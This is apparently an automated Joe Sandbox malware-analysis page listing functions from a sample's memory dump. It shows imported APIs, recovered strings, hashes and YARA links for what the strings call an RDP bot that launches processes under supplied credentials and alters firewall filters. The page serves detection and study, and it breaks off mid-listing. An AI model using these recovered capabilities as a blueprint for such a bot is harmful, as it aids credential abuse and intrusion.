Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
Instruction ID: ac61f1081a1543cb7b3b3d49ec47d6bb89a66236b290778e49c4a238f751cb13
Opcode Fuzzy Hash: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
Instruction Fuzzy Hash: EAF05E23B0C20351F992BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200

Function 00007FF64B9349A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
Instruction ID: ea937c98fd522ef77df8b19c2cd2bf04e968d66506248e9205fb5c2fad4356ef
Opcode Fuzzy Hash: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
Instruction Fuzzy Hash: 7CF05E23B0C20351F992BA69F4407BD52512F8E765E4A1536CD5CCBBE3EE3DA8878210

Function 00007FF64B93497E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
Instruction ID: 769905a02f93f4641b0fa277ade33fa2edf65550ec77602944cc6a91a029ed31
Opcode Fuzzy Hash: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
Instruction Fuzzy Hash: AFF05E23B0C20351F992BA69F4407BD12512F8E761E4A1536CD5CCBBE3EE3DA8878200

Function 00007FF64B934988 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
Instruction ID: 29ae5b9a9fc11dc39a275a538e1ae2b7df3e3f448d2934274b8c77f8e487061f
Opcode Fuzzy Hash: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
Instruction Fuzzy Hash: A4F05E23B0C20351F992BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200

Function 00007FF64B934992 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
Instruction ID: 8a30ba5028368a2d64a71a5336cbb639696dbe2fe864b7a0b5a8a411139bc4a8
Opcode Fuzzy Hash: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
Instruction Fuzzy Hash: CEF05E23B0C20351F992BA69F4417BD12512F8E765E4A1536CD6CCBBE3EE3DA8878200

Non-executed Functions

Function 00007FF64B93292E Relevance: 56.4, APIs: 17, Strings: 15, Instructions: 435stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF64B9329C0
strcat.MSVCRT ref: 00007FF64B932AFA
strlen.MSVCRT ref: 00007FF64B932B10
strlen.MSVCRT ref: 00007FF64B932B1B
strlen.MSVCRT ref: 00007FF64B932B4F
strcat.MSVCRT ref: 00007FF64B932B5F
strlen.MSVCRT ref: 00007FF64B932B9D
strlen.MSVCRT ref: 00007FF64B932BAA
strlen.MSVCRT ref: 00007FF64B932BD3
strcat.MSVCRT ref: 00007FF64B932BE5
LogonUserA.ADVAPI32 ref: 00007FF64B932C55
GetLastError.KERNEL32 ref: 00007FF64B932C63
CloseHandle.KERNEL32 ref: 00007FF64B932F27

Strings

[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu), xrefs: 00007FF64B932C8A
(pi != NULL), xrefs: 00007FF64B932A62
[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu), xrefs: 00007FF64B9330B3
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF64B932A5B, 00007FF64B932A8F, 00007FF64B932AC3
h, xrefs: 00007FF64B9330F6
(app != NULL), xrefs: 00007FF64B932A96
(usr == NULL) || (pwd != NULL), xrefs: 00007FF64B932ACA
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B932A70, 00007FF64B932AA4, 00007FF64B932AD8
[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x), xrefs: 00007FF64B932A30
[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu), xrefs: 00007FF64B932E23
[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu), xrefs: 00007FF64B932F7F
[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu), xrefs: 00007FF64B9331A5
[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu), xrefs: 00007FF64B932F10
process_create, xrefs: 00007FF64B932A29, 00007FF64B932A69, 00007FF64B932A9D, 00007FF64B932AD1, 00007FF64B932C83, 00007FF64B932E1C, 00007FF64B932F09, 00007FF64B932F78, 00007FF64B9330AC, 00007FF64B93319E
NULL, xrefs: 00007FF64B9331B6, 00007FF64B9331C2, 00007FF64B9331CE, 00007FF64B9331DA, 00007FF64B9331E6, 00007FF64B9331F2, 00007FF64B9331FE, 00007FF64B93320A, 00007FF64B933216

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: strlen$strcat$CloseErrorHandleLastLogonUser
String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$C:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
API String ID: 1842180197-3127737957
Opcode ID: 94ee048e8bd45c9939ad3021e88a51864f09f1642a4dc8886498fadcceeff011
Instruction ID: 90f0f6b1960a824e975b046659ff80df73db329f884cf8de152dc9f04693564f
Opcode Fuzzy Hash: 94ee048e8bd45c9939ad3021e88a51864f09f1642a4dc8886498fadcceeff011
Instruction Fuzzy Hash: 96128CA1A0C68281FE78BB11E4403B97290FB4E784F541136D95EC7AB7DF7CE6499701

Function 00007FF64B933DB3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32 ref: 00007FF64B933DF9
strcpy.MSVCRT ref: 00007FF64B933E14
FindFirstFileA.KERNEL32 ref: 00007FF64B933EE7
GetLastError.KERNEL32 ref: 00007FF64B933F03
GetLastError.KERNEL32 ref: 00007FF64B933F32
FindClose.KERNEL32 ref: 00007FF64B933F50

Part of subcall function 00007FF64B9314E2: fwrite.MSVCRT ref: 00007FF64B93158E
Part of subcall function 00007FF64B9314E2: fflush.MSVCRT ref: 00007FF64B93159A

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B933E57, 00007FF64B933E8F, 00007FF64B933EC7
fs_dir_list, xrefs: 00007FF64B933E50, 00007FF64B933E88, 00007FF64B933EC0, 00007FF64B933F1D, 00007FF64B933F61
[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu), xrefs: 00007FF64B933F68
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF64B933E42, 00007FF64B933E7A, 00007FF64B933EB2
(path != NULL), xrefs: 00007FF64B933E49
[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu), xrefs: 00007FF64B933F24
(resume_handle != NULL), xrefs: 00007FF64B933EB9
(name != NULL), xrefs: 00007FF64B933E81

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
API String ID: 4253334766-1535167640
Opcode ID: ff5049e7108b4606d8b9015f043b98a799f56cb1b49ebe0a8e8aeeddf7da304e
Instruction ID: 63809bcc35014dcd8197d971a86ff0c1b3e9124f4a24dc64876e3a265d717c9e
Opcode Fuzzy Hash: ff5049e7108b4606d8b9015f043b98a799f56cb1b49ebe0a8e8aeeddf7da304e
Instruction Fuzzy Hash: 2C611B21E5C55386FB607B68E4043B86360AF0F354FA52132E96ECBAF6DE6DE9448341

Function 00007FF64B931A19 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 103COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 00007FF64B931A46
LoadResource.KERNEL32 ref: 00007FF64B931A5E

Part of subcall function 00007FF64B9314E2: fwrite.MSVCRT ref: 00007FF64B93158E
Part of subcall function 00007FF64B9314E2: fflush.MSVCRT ref: 00007FF64B93159A

GetLastError.KERNEL32 ref: 00007FF64B931B58
GetLastError.KERNEL32 ref: 00007FF64B931B8D
GetLastError.KERNEL32 ref: 00007FF64B931B92

Strings

[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat, xrefs: 00007FF64B931AE6
(hnd != NULL), xrefs: 00007FF64B931B11
[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu), xrefs: 00007FF64B931B6D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B931B1F, 00007FF64B931B4A
[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu), xrefs: 00007FF64B931BA2
C:/Projects/rdp/bot/codebase/module.c, xrefs: 00007FF64B931B0A, 00007FF64B931B35
module_get_version, xrefs: 00007FF64B931ADF, 00007FF64B931B18, 00007FF64B931B43, 00007FF64B931B66, 00007FF64B931B9B
(out != NULL), xrefs: 00007FF64B931B3C

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: ErrorLast$Resource$FindLoadfflushfwrite
String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
API String ID: 2123903355-2019010457
Opcode ID: bebd427b92f1e5c21e62c97bedb703bb783ca4cbadeeb975c81eb13876ce5c63
Instruction ID: 997cc65ac7e915e91feffd578121dea1cbb7350ab18a57e1e50d9dd5c46681aa
Opcode Fuzzy Hash: bebd427b92f1e5c21e62c97bedb703bb783ca4cbadeeb975c81eb13876ce5c63
Instruction Fuzzy Hash: EF410C71A1C6568AEB54FF68E44056977A0FB4E754F101135EA6CC3AB6EF3CE544CB00

Function 00007FF64B93FF1F Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF64B93FF2E
GetProcAddress.KERNEL32 ref: 00007FF64B93FF45
LoadLibraryW.KERNEL32 ref: 00007FF64B93FF53
GetProcAddress.KERNEL32 ref: 00007FF64B93FF63

Strings

rand_s, xrefs: 00007FF64B93FF3B
advapi32.dll, xrefs: 00007FF64B93FF4C
SystemFunction036, xrefs: 00007FF64B93FF59
msvcrt.dll, xrefs: 00007FF64B93FF27

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
Instruction ID: 45ecdd4b403c5070a8175bef2eb42cb518d0f0ec24ba8539d7694c9cc3234a65
Opcode Fuzzy Hash: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
Instruction Fuzzy Hash: 2BF0DF60E1EA1B90EE05FB12FC500A477A4BF0E794B841172C82DC2332EFACA15AC700

Function 00007FF64B93929A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 118COMMON

Download Yara Rule

APIs

inet_addr.WS2_32 ref: 00007FF64B9392B1
ntohl.WS2_32 ref: 00007FF64B9392B9

Part of subcall function 00007FF64B9314E2: fwrite.MSVCRT ref: 00007FF64B93158E
Part of subcall function 00007FF64B9314E2: fflush.MSVCRT ref: 00007FF64B93159A

Strings

TL, xrefs: 00007FF64B9392D6
3L, xrefs: 00007FF64B939486
[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx), xrefs: 00007FF64B939367
[E] (%s) -> FwpmFilterAdd0(IPv4) failed(filt_idx=%d,res=%08lx), xrefs: 00007FF64B939521
setup_ip4_filt, xrefs: 00007FF64B939360, 00007FF64B93951A

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fflushfwriteinet_addrntohl
String ID: 3L$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(filt_idx=%d,res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$setup_ip4_filt
API String ID: 3255839625-58178811
Opcode ID: d256b7c3bfc4f1f46297c99cf1b9fdebdcffbd4f8ce2096f4faa639793330bd3
Instruction ID: 93a6dadb35d200c1c3b49fbf910e01f0cc186cf222d4870eb55909bba1990eb9
Opcode Fuzzy Hash: d256b7c3bfc4f1f46297c99cf1b9fdebdcffbd4f8ce2096f4faa639793330bd3
Instruction Fuzzy Hash: D1517E3260CBC585E771AB28F4403DE76A5EB99784F405128D6CD8BBAAEF3DC185CB40

Function 00007FF64B936FD5 Relevance: 1.5, APIs: 1, Instructions: 25timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF64B936FF0

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
Instruction ID: 66b0dd0c70f5acff8e73925c27580a681638932146654e08331eeda47b9b4b79
Opcode Fuzzy Hash: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
Instruction Fuzzy Hash: 0DE022A272C90583EF20E609E0407BBA351C79C384F605030E95DC3B64DE2CD9428B40

Function 00007FF64B94B6A0 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b903c808809adb16dfa016090dfacf5a5f100b12dc606a88c025edecc6fee081
Instruction ID: 86d99a35d9882cb22a8ae487ed20492448cb6e51437b6ed9da65aed3a47c4870
Opcode Fuzzy Hash: b903c808809adb16dfa016090dfacf5a5f100b12dc606a88c025edecc6fee081
Instruction Fuzzy Hash: 9631D49BE4DAD189E25276244C791643F91ABABB3174D807ECE58C3AF3AD0E2C068301

Function 00007FF64B9405D9 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
Instruction ID: 47ec45e549eaac06a6c1bda03fe790d1ac85ed07ebf01fe6a75a27def22dfbbe
Opcode Fuzzy Hash: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
Instruction Fuzzy Hash: D8A0021294DC09C4E6402F10EC012717528EB0F710F842230C038D20668F2C90008104

Function 00007FF64B93212F Relevance: 66.9, APIs: 13, Strings: 25, Instructions: 417processstringCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF64B932163
Process32First.KERNEL32 ref: 00007FF64B932197
GetLastError.KERNEL32 ref: 00007FF64B932227
GetLastError.KERNEL32 ref: 00007FF64B9322FF
strcmp.MSVCRT ref: 00007FF64B9324CA
